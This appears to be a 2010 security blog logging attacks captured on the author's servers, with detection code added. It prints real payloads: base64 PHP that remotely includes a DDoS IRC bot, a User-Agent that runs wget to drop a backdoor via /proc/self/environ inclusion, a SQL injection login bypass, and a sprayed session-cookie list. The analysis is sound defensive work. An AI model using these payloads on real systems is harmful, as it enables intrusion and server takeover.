Sunday, September 19, 2010

Hoping for the Best

Event Details


Date

19 September 2010



COOKIE Values
Name / Value
ASPSESSIONIDSCRTBQQCJGNLBCPCKBOMMKEIJFCJMPFM
CFID22383750
CFTOKEN51721005
CFGLOBALSurltoken=CFID#=22383750&CFTOKEN#=51721005#lastvisit={ts '2010-09-19 16:18:43'}#timecreated={ts '2010-09-19 16:18:43'}#hitcount=2#cftoken=51729001#cfid=21383760#
X-Mapping-didaedeaEB0B1083BAF4C099C589235951FDADBB
X-Mapping-caklakng4A5C5709EC4B181DC062F79B5B21E09C
_icl_current_languagees
PHPSESSID1c1c463d4ad1c2a798e26c1af3ba3da2
X-Mapping-edafcnem579465E39B484F85E6231FC9E6D1E138
BALANCEDIDbalancer.www281
_netadventist3_session6e30595e8493a9f11a50303c6f8b3c4f
27120c955796957883def31ab14a052b4d9bc3bfa241ef361cf628884
wordpress_test_cookieWP Cookie check
ASPSESSIONIDSACDTSDANHMLENACFGBEHMCABMDHKDKE
fcfcVal
parkinglot1
JSESSIONID1qutet5rna2pq
LB1924488576.20180.0000
qtrans_cookie_testqTranslate Cookie Test
tmgioctTfNxDct6ErNB31xoEqZceoIc
sid_1_1a7703732a7afa22fe260a067c65c7990
BIGipServerbit-inet-http-linux37803466.20481.0000
SessionIDdb3a7c81-3741-4f9a-a900-5d97ce333560
VisitorID2a3dd61e-1bf6-42ea-a399-d4d2ad86f40c&Exp
googleTokenZGMGKDOD2McKEwie0O3aiZSkAhUOIIcKHUYYesgYAyAAMPj7ggE4DVD4- 4IBUKT5mA9Q9vKxEVDU6IQbUIq23B5Q8dqtKQ
pixelstats_visitor_id67331fee75245061388da3fd9e77df72
d528690ac3f32d512b24a755b7ccecde84ae7c9a42e3810d5cfa413
SESSfb1d8525d94d660bc8f929hscilkep1adt9of1agj8tum54
BX868p31969ciuf&b
SERVERIDweb1-2
tu061b31ae4fe862878a7595117ae8416a
X-Mapping-nbjnphkm8DA8508445391E23666146AE567F08EC
Apache95.65.x.x.835171294912545338
X-Mapping-kjicghkcC960851A671102A97B52FDBF75C01665
b91c4587747e94d96ce5d3fbcab89b0ce5f389779ded811f402d4c
CFCV_MERCHANTLASTVISITTIME{ts '2010-09-19 09:26:05'}
X-Mapping-beedigeg5E30EDBC3F2176516FE6669D5F48B32E
wordpress_d76e66a54228b4|1286123411|bbff8436665d6b302d1c6abeeab7bc04
wordpress_logged_in_d76e66a54228|1286123411|d68e34164b9b1a0b21f92baef42e9d84
ASPSESSIONIDQAAADCBSOHCHFJADOJKJCBFEOPFKALCN
wikidot_token771ad16ad2c4d81f328082ff6c4b20768
VSESSID1359648.dca700188a89324e44f3e81bf58d4aa6
VISITID6e193f4b3162a051fece049be7fac04b
COMMUNITY_ID1359658.b2219323397be5f626b3c2c0100ea84b
languageen
TRIBE_NETb
ljuniqgl3ocO74evXTwzM:1284914251:pgstats0:m0
bncom95.65.xx.xx.241961284920569217
BNSc1d60fa2c29235f0abc24034ff19d470
lot1285519205
USER_COUNTRYRO
USERNAMEdeleted
UPdeleted
IPSETdeleted
lastpagedevilsinferno
GEOIP_COUNTRY_CODEMD
ARPTJIUJWUS10.201.6.104CKMKM
Coyote-2-d81ebee0d8c54a52:0
golfczech_sessionnh4l85bhnp5tqp22cv51if8677
TS5d4ca4c388a426083b9296b647cf490399f55d0533d6b8bac9704a4c963e62
cl_b1284915225980101709
appletvsource_com8nf7q9lp2a84a9kr1dkeih96n0
xn_visitorb74a0c19-a529-45f5-1d6f-17697f716573
ning_sessionl8UkOxI3LABk5Kk9GbCk/Iai2V31f0zebfJS4Yg/NOj3EBhXV 4sA7KUbx66EgnL19vQa9yn/Gg
SESS19be68902958250fb1aabe273a8e37c60088cgm6ucm52otu62d6etgbd2
ASP_NET_SessionId50ygrp45hg5a4kzrpdchrkzs
rl-sticky-keyc0a8005251
Geo{"city":"Chisinau","country":"MD","lat":"47.005600","lon":"28.857500"}
datr1284915781-d92ab9c6f7bd8e6cd366b4ef22e66fd8be1efcddae1128b43a3c9
BIGipServerbensbargains_POOL2447708342.20481.0000
visnSB7MgX1MM3gmaBD6yVGB9uAuruCbkxsMqGcSOqIZN/RVjnHdGoGbcji55I6PBcYFOid/nH7RyzLbIi2XIO 5 HTD3XNFjIdauVbD/QYFjaEwvPUxhyNkWIT4yGIF6Sg
X-Mapping-eacdndmjE0173EA196311D523CD792DA546E7F1F
pen14
f4c2dbffe8b9bb602e4145d5dd5ad48c-
exp_last_visit1284913845
exp_last_activity1284944714
ee_language_irish
mvp_session088f0cdeec0dd1ba6a45311d6257139d
wp_ozh_wsa_visits1
wp_ozh_wsa_visit_lasttime1284917831
X-Mapping-hmaddpemB1B24346D692009D6D05252779F5C8AB
abtesta
ASPSESSIONIDSQSBRQDCCPNGANLCHIBBJADLMJNDAAAF
h09392d5de016c2eba5d5e66f5d2581bc
protected11
zf_5y_visitor-A6un8UwaiKZgFNt38zCsl9BSoIAAAAAZlJq5yMN51sz
Coyote-2-b869c4c1b869c41c:0
session_id"ce49065f87912cb219f96566910f4e84f0898974::95.65.74.130"
X-Mapping-jhoibjei04BDBCMEE22CBB3BFFC49AA4445AF849
dublbom_com51a4784b26b5ef6c87a4a563ea3779d1
_zsessBAh7BjoPc1Vzc2lvbl9pZCIlMjhjYzRlMjMwOTRjOGQ2MWRhMzU0NzU=-- a84415741b6bb513ed083488ec51
cwebJONQJVSxx.x.xxx.xxxCKMKY
SESSc9b1f25375c7119f0d5b1d92de2dfbaa487e7e7dd4ac0246fa9m962295783dca
simtel_cookie302987322.261.0000
_redmine_sessionBAh7BjbPc2Vzc2lvbl9pZCIlY2EyYzk3NWQ4N=-- ae98617c73721ef0c5c3ff359f67f75c3a5


SERVER Values

HTTP_USER_AGENT: Opera/9.51 (Windows NT 5.1; U; en)



What the hacker was hoping for

Looking at this, it seems quite apparent that the visitor was trying to get into restricted parts of the site (or into third-party software running on it) by replaying every session cookie he could think of at the web server.
WordPress (blogging software), ColdFusion (CFID/CFTOKEN/CFGLOBALS), Drupal (the SESS... cookies), classic ASP, ASP.NET, PHP and Java session ids, Ning (social network), Wikidot (wiki hosting) and Rails applications such as Redmine (_redmine_session, _zsess) are all represented. Not everything in the list is an authentication cookie, though: the X-Mapping-*, BIGipServer*, BALANCEID and SERVERID values are load-balancer persistence cookies that only pin a client to a back-end server, and the GeoIP, language and tracking cookies are harmless on their own.



The attacker is hoping that you run one of the applications he has a cookie for and that the replayed session cookie will be accepted as a logged-in user.



Alternatively he might be running a spam bot and hoping that one of the sessions gets him into the comment sections of blogs and social platforms so he can post comment spam.
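To turn this pattern into a detection rule, here is an added example in Python (not code from the original post): it parses a Cookie header, groups the cookie names by the software that issues them, ignores load-balancer persistence cookies, and flags a request that carries session cookies for several unrelated stacks at once. The sample header is constructed from the cookie names above with placeholder values, and the family patterns are heuristics assumed for the example.

```python
import re

# Constructed sample Cookie header: the names are taken from the capture
# above, the values are placeholders.
SAMPLE_COOKIE_HEADER = (
    "ASPSESSIONIDSCRTBQQC=x; CFID=22383750; CFTOKEN=51721005; PHPSESSID=x; "
    "JSESSIONID=x; wordpress_logged_in_d76e66a54228=x; wordpress_test_cookie=x; "
    "ning_session=x; wikidot_token7=x; _redmine_session=x; _zsess=x; "
    "SESSfb1d8525d94d660bc8f929a1b2c3d4e5=x; X-Mapping-didaedea=x; "
    "X-Mapping-caklakng=x; BIGipServerbit-inet-http-linux=x; BALANCEID=x; "
    "SERVERID=x; ASP.NET_SessionId=x; sid_1_1=x; GEOIP_COUNTRY_CODE=MD"
)

# Cookie-name patterns grouped by the software that issues them. These are
# heuristics (assumed here); names that match nothing fall into "other".
FAMILIES = {
    "wordpress": re.compile(r"^wordpress_", re.I),
    "coldfusion": re.compile(r"^(CFID|CFTOKEN|CFGLOBALS)$", re.I),
    "asp_classic": re.compile(r"^ASPSESSIONID", re.I),
    "asp_net": re.compile(r"^ASP[._]NET_SessionId$", re.I),
    "php": re.compile(r"^PHPSESSID$"),
    "java": re.compile(r"^JSESSIONID$"),
    "drupal": re.compile(r"^SESS[0-9a-f]{16,}", re.I),      # SESS + hash of the site
    "rails": re.compile(r"^_\w*sess(ion)?$", re.I),         # _redmine_session, _zsess
    "ning": re.compile(r"^ning_session$"),
    "wikidot": re.compile(r"^wikidot_token\d*$"),
    # Load-balancer persistence cookies pin a client to a back end; they are
    # not credentials and are excluded from the count below.
    "lb_persistence": re.compile(r"^(X-Mapping-|BIGipServer|BALANCEID$|SERVERID$)", re.I),
}


def parse_cookie_header(header):
    """Split a Cookie header into a dict of name -> value."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def classify(name):
    """Return the software family a cookie name belongs to, or 'other'."""
    for family, pattern in FAMILIES.items():
        if pattern.search(name):
            return family
    return "other"


def session_families(header):
    """Application families whose session cookies appear in the header,
    ignoring routing cookies and unrecognised names."""
    families = {classify(name) for name in parse_cookie_header(header)}
    families.discard("lb_persistence")
    families.discard("other")
    return families


def is_cookie_spray(header, threshold=3):
    """A real browser holds session cookies for one application per host.
    Session cookies for several unrelated stacks in one request is the
    'hoping for the best' pattern described above."""
    return len(session_families(header)) >= threshold


if __name__ == "__main__":
    print(sorted(session_families(SAMPLE_COOKIE_HEADER)))
    print("cookie spray" if is_cookie_spray(SAMPLE_COOKIE_HEADER) else "normal")
```

The threshold is deliberately low: two families can occur legitimately (a WordPress site behind a PHP session), but three or more unrelated application stacks in a single request is worth a weighting hit in the same sense the author uses the word below.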



How to prevent this

  • Ensure that your 3rd party software is always up to date
    • Register for the vendor's release mailing list
    • Check the vendor's site regularly



What we know about the visitor
This is only from one IP address, geolocating to Moldova (the Geo and GEOIP_COUNTRY_CODE cookies he carried also point at Chisinau), and the cookie pattern should make for an interesting breakdown. Some of them might even be valid authentication cookies for 3rd party media sites.

Threat Level
Low

Course of Action
If this has happened to you, do the following:

  • Check for and remove unauthorized 3rd party user accounts
  • Update your 3rd party software

Tuesday, September 14, 2010

The Cold Fusion Request

Event Details


Date
14 September 2010

POST Values
CFID:
xxxxxxxx, CFTOKEN=xxxxxxxx, CFGLOBALS=urltoken=CFID#=xxxxxxx&CFTOKEN#=xxxxxxx#lastvisit={ts '2010-09-14 14:33:18'}#timecreated={ts '2010-09-14 14:33:18'}#hitcount=2#cftoken=xxxxxxxx#cfid=xxxxxxxx#, __mmsid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx, __mmuid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx, __mmtrk=0|||x|xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

What the hacker was hoping for

This isn't actually a hack attempt. CFID, CFTOKEN and CFGLOBALS are the cookies ColdFusion's built-in client and session management hands out, and browsers that have visited a ColdFusion site keep sending them; here they arrived as form values. It will crop up occasionally in your logs. Sometimes they are forged, sometimes not. However, if you're not running ColdFusion (which you shouldn't be), the values mean nothing to your application and you should be safe.

How to prevent this


  • Don't run ColdFusion

Friday, July 9, 2010

The IRC Bot

Event Details


Date
9 July 2010

POST Values
author_name:
[php]echo(base64_decode("ZU5kQQ==").php_uname().base64_decode("ZU5kQQ=="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));;die();[/php]

SERVER Values
HTTP_USER_AGENT: Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

What the hacker was hoping for

This is an interesting one: the attacker is attempting a BBCode injection, hoping that the library that renders the BBCode will treat the code enclosed in [php]...[/php] as PHP and execute it rather than merely syntax-highlighting it.

The PHP would then decode the base64 strings and execute something equivalent to this:

[php]echo "eNdA" . php_uname() ."eNdA";
include("http://planetworkteam.fileave.com/ddos.txt??");
include("http://planetworkteam.fileave.com/ddos.txt??");; die();[/php]


The included remote file would then start an IRC bot that connects to a remote IRC server and waits for commands from a controller. The commands this bot can perform are as follows:

.user //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail //send an email
.dns //dns lookup
.download //download a file
.exec // uses exec() //execute a command
.sexec // uses shell_exec() //execute a command
.cmd // uses popen() //execute a command
.info //get system information
.php // uses eval() //execute php code
.tcpflood //tcpflood attack
.udpflood //udpflood attack
.raw //raw IRC command
.rndnick //change nickname
.pscan //port scan
.safe // test safe_mode (dvl)
.inbox // test inbox (dvl)
.conback // connect back (dvl)
.uname // return shell's uname using a php function (dvl)


The source code also contains an encoded Perl script used to connect and download data from a remote location and spawn bash shells (called "Data Cha0s Connect Back Backdoor").
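To see what a payload like this does without running it, here is an added Python example (not the post's code and not the bot's): it pulls the PHP out of the [php] tags, decodes every base64_decode("...") literal in place and lists the remote URLs the include() calls would fetch, which is exactly the decoded form shown above. The input is the author_name value captured above, copied verbatim.

```python
import base64
import re

# The author_name value captured in the request above, copied verbatim.
CAPTURED_PAYLOAD = (
    '[php]echo(base64_decode("ZU5kQQ==").php_uname().base64_decode("ZU5kQQ=="));'
    'include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));'
    'include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));'
    ';die();[/php]'
)

BBCODE_PHP = re.compile(r"\[php\](.*?)\[/php\]", re.I | re.S)
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
REMOTE_INCLUDE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(\s*["\'](https?://[^"\']+)["\']')


def decode_b64_literal(s):
    """Decode one base64 literal; pad it first because droppers sometimes
    strip the trailing '=' characters."""
    s = s + "=" * (-len(s) % 4)
    return base64.b64decode(s).decode("utf-8", errors="replace")


def deobfuscate(php_code):
    """Replace every base64_decode("...") call with the decoded string as a
    quoted PHP literal, so the code reads as the attacker intended it to run."""
    def repl(match):
        decoded = decode_b64_literal(match.group(1)).replace('"', '\\"')
        return '"' + decoded + '"'
    return B64_CALL.sub(repl, php_code)


def extract_php_blocks(field_value):
    """Return the contents of every [php]...[/php] tag in a submitted field."""
    return [m.group(1) for m in BBCODE_PHP.finditer(field_value)]


def remote_includes(field_value):
    """URLs the payload would include() if it were executed: the download
    sources for the bot, useful for blocking and for hunting in other logs."""
    urls = []
    for block in extract_php_blocks(field_value):
        urls.extend(REMOTE_INCLUDE.findall(deobfuscate(block)))
    return sorted(set(urls))


def is_bbcode_php_injection(field_value):
    """Flag a field that carries a [php] tag together with obfuscated or
    remote-loading PHP; plain [b]...[/b] markup does not trigger it."""
    blocks = extract_php_blocks(field_value)
    return any(B64_CALL.search(b) or REMOTE_INCLUDE.search(deobfuscate(b))
               for b in blocks)


if __name__ == "__main__":
    for block in extract_php_blocks(CAPTURED_PAYLOAD):
        print(deobfuscate(block))
    print(remote_includes(CAPTURED_PAYLOAD))
```

Decoding the literals is safe because nothing is evaluated; the output is the plaintext the bot author was hiding, and the URL list is what you would feed to an egress block list while the host is being cleaned.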

How to prevent this


  • Sanitize your inputs

  • Properly configure any 3rd party libraries.
    • If a 3rd party library allows users to execute arbitrary code then you're asking for trouble.




What we know about the visitor
These attacks have come from numerous IP addresses (most likely compromised machines), so it won't help us identify the hacker.

Attacking Ips:
24.120.145.188
38.117.65.242
41.78.28.104
62.12.136.135
62.44.82.118
62.44.123.3
64.34.170.92
64.89.247.4
64.156.24.220
65.183.182.51
66.76.26.88
66.98.216.16
66.135.41.16
66.230.225.82
67.148.93.62
67.222.22.44
69.70.153.210
69.73.155.53
69.197.157.190
72.1.114.141
72.55.156.70
72.55.165.45
74.206.118.177
75.125.43.162
80.172.236.56
80.177.1.221
81.2.252.33
81.93.192.2
81.93.240.71
81.169.129.100
83.96.231.105
83.143.81.42
84.21.8.208
84.255.193.115
85.19.150.100
87.238.162.10
88.84.142.223
89.32.43.251
89.33.78.92
89.200.169.131
91.121.79.138
91.121.175.184
93.186.192.124
93.190.48.203
94.23.205.159
94.143.220.3
95.168.196.66
98.108.68.50
99.7.55.150
109.86.145.204
114.108.151.149
119.235.18.12
157.181.172.226
157.181.239.239
173.55.123.62
187.45.193.227
188.241.116.138
189.59.8.29
190.95.200.114
192.154.46.38
193.226.30.130
193.246.108.253
194.50.101.248
195.5.163.206
195.199.40.194
195.216.196.122
195.228.86.27
196.41.123.167
199.184.237.35
200.201.180.130
201.116.197.150
202.75.36.10
203.147.62.92
204.15.37.220
204.122.16.64
206.123.118.132
207.218.209.178
208.79.205.56
208.101.48.50
209.85.52.140
209.126.254.119
210.0.213.83
211.206.120.196
211.210.38.8
212.59.6.16
212.61.10.82
212.159.7.202
213.163.84.4
213.165.85.241
213.199.192.18
213.232.94.135
217.64.195.236
217.112.42.77
217.112.84.13
218.38.34.19
219.94.129.49


We can see the HTTP_USER_AGENT is distinctive (a Russian-language Netscape 4.76 on Solaris 7 is not something you see in 2010 traffic) and can be used to identify visits from the hacker's scripts.





Browser: Netscape 4.76
OS: Solaris (SunOS 5.7, sun4u)
Language: ru (Russian)


The source code of the IRC bot contains comments in both English and Portuguese. By the looks of it (variable names, placement of comments, etc.), the code was originally written by an English speaker and later adapted by a Portuguese speaker.

What we do know is where this hacker and his bots hang out (IRC server and channels are listed in the source code).

Threat Level
Medium

Course of Action
If this has happened to you, do the following:


  • Take the server offline (if possible)

  • Check active process list for unknown scripts and kill them

  • Fix or remove the vulnerable library

  • Monitor your logs. The hacker will probably return and attempt to reinfect your server.

  • If you don't use it yourself, block both inbound and outbound access to port 6667 (default IRC port)

Friday, June 25, 2010

The proc/self/environ Injection

Event Details


Date
21 June 2010

POST Values
file: ../../proc/self/environ

SERVER Values
HTTP_USER_AGENT: <? exec("wget http://[remotescript].txt -O backdoor.php"); ?>
This is a simplified version of what was captured in the user agent field.

What the hacker was hoping for
What we have here is a local file inclusion (LFI) attack coupled with PHP code injected through the User-Agent header.

The visitor hopes that my code that handles file inclusion is written something like this:
<?php
// Include file requested
include($_GET['file']);
?>


Thus the file that gets included would be:

/var/www/../../proc/self/environ (which resolves to /proc/self/environ)

The hacker is attempting to include the /proc entry for the Apache process that is handling his request. /proc/ exposes information about every running process, and /proc/self/ is the process that is reading it, here the web server process running PHP. /proc/self/environ holds that process's environment variables, which in a CGI-style environment include the visitor's IP address, User-Agent, the script called and other values like these (this only works where the request's CGI variables actually end up in the process environment, for example when PHP runs as CGI/FastCGI; with mod_php the file usually shows only the environment Apache was started with, and the attacker also needs read access to it):


DOCUMENT_ROOT=/var/www
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=
HTTP_HOST=www.example.com
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
PATH=/bin:/usr/bin
QUERY_STRING=
REMOTE_ADDR=x.x.x.x
REMOTE_PORT=xxxx
REQUEST_METHOD=GET
REQUEST_URI=/index.php
SCRIPT_FILENAME=/var/www/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=x.x.x.x
SERVER_ADMIN=webmaster@example.com
SERVER_NAME=www.example.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.1
SERVER_SIGNATURE=
SERVER_SOFTWARE=Apache/2.0 (Unix)

(In the real file the variables are separated by NUL bytes, not newlines.)


However, since the hacker set his own User-Agent, the HTTP_USER_AGENT entry of that file contains PHP code, and because include() parses whatever it reads as PHP, that code runs. It shells out to wget to retrieve a remote script and write it into the website folder:

<?
// Fetch the remote script and save it as backdoor.php in the web root
exec("wget http://[remotescript].txt -O backdoor.php");
?>


Now the hacker can visit his page and run any command he wants on your web server:

http://www.example.com/backdoor.php
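As an added example (Python, not the PHP of the page), here is the check a log analyser or WAF rule would apply to this request: resolve the requested file against the document root the way include() would, flag anything that escapes the root or lands on a sensitive file such as /proc/self/environ, and flag PHP open tags in the User-Agent. The document root /var/www and the sample requests are assumed for the example; the first sample mirrors the captured request, the others are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

DOC_ROOT = "/var/www"   # assumed document root, as in the example above

# Constructed sample requests in the shape of the capture above.
SAMPLE_REQUESTS = [
    {"file": "../../proc/self/environ",
     "user_agent": '<? exec("wget http://[remotescript].txt -O backdoor.php"); ?>'},
    {"file": "..%2F..%2F..%2Fetc%2Fpasswd", "user_agent": "Mozilla/5.0"},
    {"file": "file1.php", "user_agent": "Mozilla/5.0"},
]

# Short and long PHP open tags, and the close tag.
PHP_TAG = re.compile(r"<\?(?:php|=)?|\?>")
SENSITIVE = ("/proc/self/environ", "/proc/self/cmdline", "/etc/passwd")


def resolve_include(doc_root, requested):
    """Resolve the requested path the way include() would for a script
    running in doc_root. URL-decode twice to catch double encoding, then
    collapse the '..' segments; an absolute path replaces the root."""
    decoded = unquote(unquote(requested))
    return posixpath.normpath(posixpath.join(doc_root, decoded))


def is_traversal(doc_root, requested):
    """True when the resolved path is outside the document root."""
    resolved = resolve_include(doc_root, requested)
    return not (resolved == doc_root or resolved.startswith(doc_root + "/"))


def has_php_code(header_value):
    """True when a header carries PHP tags, the second half of this attack."""
    return bool(PHP_TAG.search(header_value))


def classify_request(req, doc_root=DOC_ROOT):
    """Return the findings for one request, in the order they were checked."""
    findings = []
    target = resolve_include(doc_root, req["file"])
    if is_traversal(doc_root, req["file"]):
        findings.append("traversal:" + target)
    if target in SENSITIVE:
        findings.append("sensitive_file")
    if has_php_code(req["user_agent"]):
        findings.append("php_in_user_agent")
    # The combination is the /proc/self/environ code-execution attempt.
    if target == "/proc/self/environ" and "php_in_user_agent" in findings:
        findings.append("proc_environ_rce_attempt")
    return findings


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["file"], "->", classify_request(req) or "clean")
```

The traversal check alone would have caught the request; the User-Agent check is what tells you it was an attempt at code execution rather than a read of /etc/passwd, which changes the course of action from "patch" to "assume compromise and look for backdoor.php".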

How to prevent this

  • Sanitize your inputs
    • Ensure that directory traversal is disabled/checked for
    • Work with an allowed list of files

      $allowed_files = array('file1.php', 'file2.php');
      // array_search() returns false (not NULL) when nothing matches, so
      // compare against false; the third argument forces a strict match
      $allowed_index = array_search($_GET['file'], $allowed_files, true);
      if ($allowed_index !== false)
      {
          include $allowed_files[$allowed_index];
      }


    • Better still, don't let visitors name the file at all; map a fixed key to each file

      $allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
      if (isset($_GET['file']) && isset($allowed_files[$_GET['file']]))
      {
          include $allowed_files[$_GET['file']];
      }



Threat Level
High

Course of Action

If this has happened to you, do the following:
  • Take the server offline (if possible)
  • Check active process list for unknown scripts and kill them
  • Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
  • Check your httpd/Apache logs (usually in /var/log/httpd/, /var/log/apache/ or /var/log/apache2/) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
  • Remove backdoor scripts
  • Monitor your logs. The hacker will probably return and attempt to reinfect your server.

Thursday, June 24, 2010

The Common Probing

Event Details

Date
22 June 2010

POST Values
username: ' OR 1='1
password: ' OR 1='1

What we have here is a classic probe to determine whether the login form is vulnerable to SQL injection and can be bypassed.

What the visitor was hoping for
The visitor was hoping that I am not sanitizing my inputs, so that when my SQL query is built his input becomes part of the query and lets him bypass the login.

Example:
SELECT * FROM user WHERE username='[x]' AND password='[y]' LIMIT 1
Would become:
SELECT * FROM user WHERE username='' OR 1='1' AND password='' OR 1='1' LIMIT 1
Because AND binds tighter than OR, the WHERE clause reads as username='' OR (1='1' AND password='') OR 1='1', which is always true, so the query returns the first row of the user table and he is logged in as that user (frequently the administrator).
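Here is the bypass and its fix carried through in Python with sqlite3, as an added example rather than the post's code. One difference from MySQL: SQLite compares the integer 1 and the string '1' as unequal, so the tautology is written '1'='1' here (the same injection in the form both engines accept). The user table, its single row and the plaintext password are constructed for the demo; a real application stores password hashes.

```python
import sqlite3

# The probe from the capture above, closing the quoted value and appending a
# tautology. Written '1'='1' rather than 1='1' because SQLite compares an
# integer and a string as unequal; MySQL accepts either form.
PROBE = "' OR '1'='1"


def make_db():
    """In-memory user table with one row. Plaintext password only to mirror
    the query shape above; store hashes in real code."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO user (username, password) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def render_vulnerable(username, password):
    """The query string a naive application builds by concatenation: the
    user's quotes become part of the SQL grammar."""
    return ("SELECT * FROM user WHERE username='%s' AND password='%s' LIMIT 1"
            % (username, password))


def login_vulnerable(conn, username, password):
    return conn.execute(render_vulnerable(username, password)).fetchone()


def login_safe(conn, username, password):
    """Prepared statement with bound parameters: the driver sends the values
    separately from the SQL text, so quotes inside them stay data."""
    sql = "SELECT * FROM user WHERE username=? AND password=? LIMIT 1"
    return conn.execute(sql, (username, password)).fetchone()


def demo():
    """Run the probe against both versions and a legitimate login against
    the safe one; returns the matched rows (None when no row matched)."""
    conn = make_db()
    try:
        return {
            "vulnerable": login_vulnerable(conn, PROBE, PROBE),
            "safe": login_safe(conn, PROBE, PROBE),
            "legit": login_safe(conn, "admin", "s3cret"),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    print(render_vulnerable(PROBE, PROBE))
    for name, row in demo().items():
        print(name, "->", row)
```

The point of the parameterized version is that there is nothing to sanitize: the probe is looked up as a literal username of "' OR '1'='1", finds no such user, and the login fails.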

How to prevent this
  • Sanitize your inputs (type-cast your numerics where possible)
  • Use prepared statements with bound parameters for your queries

If you are unsure on how to do this, I recommend reading up on SQL Injections Attacks.

What we know about the visitor
Any visit to your website will always provide you with a wealth of information about the visitor. By simply examining the IP address and the HTTP headers passed, we can normally determine a lot about the visitor.

Firstly we make a quick trip to a whois lookup tool and we find that the IP address belonged to the block assigned to Saudi Arabia (109.82.40.0 - 109.83.255.255). We now can make an educated guess where our visitor is located.

If you want something a bit more accurate, you can look at geoip location services such as MaxMind.

Now we'll dig through the HTTP headers.

HTTP_ACCEPT_LANGUAGE
This tells us the visitor's preferred language. In this case it is ar-SA, which a quick lookup on a language code chart shows to be Arabic (Saudi Arabia).

HTTP_USER_AGENT
The HTTP_USER_AGENT header can provide us with more information than just which browser the person is using.

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; AskTbGOM2/5.7.0.231)

A quick visit to http://user-agent-string.info will give us a breakdown of the user agent string.

Browser: Internet Explorer 8.0 (Trident/4.0)
OS: Windows 7 (Windows NT 6.1)
Installed .NET versions: 2.0.50727, 3.5.30729, 3.0.30729
Office suite: probably (InfoPath 2 is an MS Office component)

HTTP_X_BLUECOAT_VIA
The visitor is going through a Blue Coat proxy. The value passed in this header is the proxy's session identifier for the visitor.

REMOTE_ADDR
This is usually the IP address of the visitor. In this case it is the IP address of the Blue Coat proxy, so the whois result above locates the proxy rather than the person behind it; the Accept-Language header is the better hint about the visitor himself.

Threat level

Low

Course of Action

Add weight to visitors coming through Blue Coat proxies

(When I refer to weight, I'm talking about the weighting that is assigned to a request that determines whether the request is a hostile action and whether it should be blocked or reported).

Introduction

Welcome to Web Security Log. This blog will be dedicated to listing incoming attacks on the various servers I monitor. I'll endeavour to explain each attack, what the attacker is hoping to achieve and ways to protect yourself against these attacks.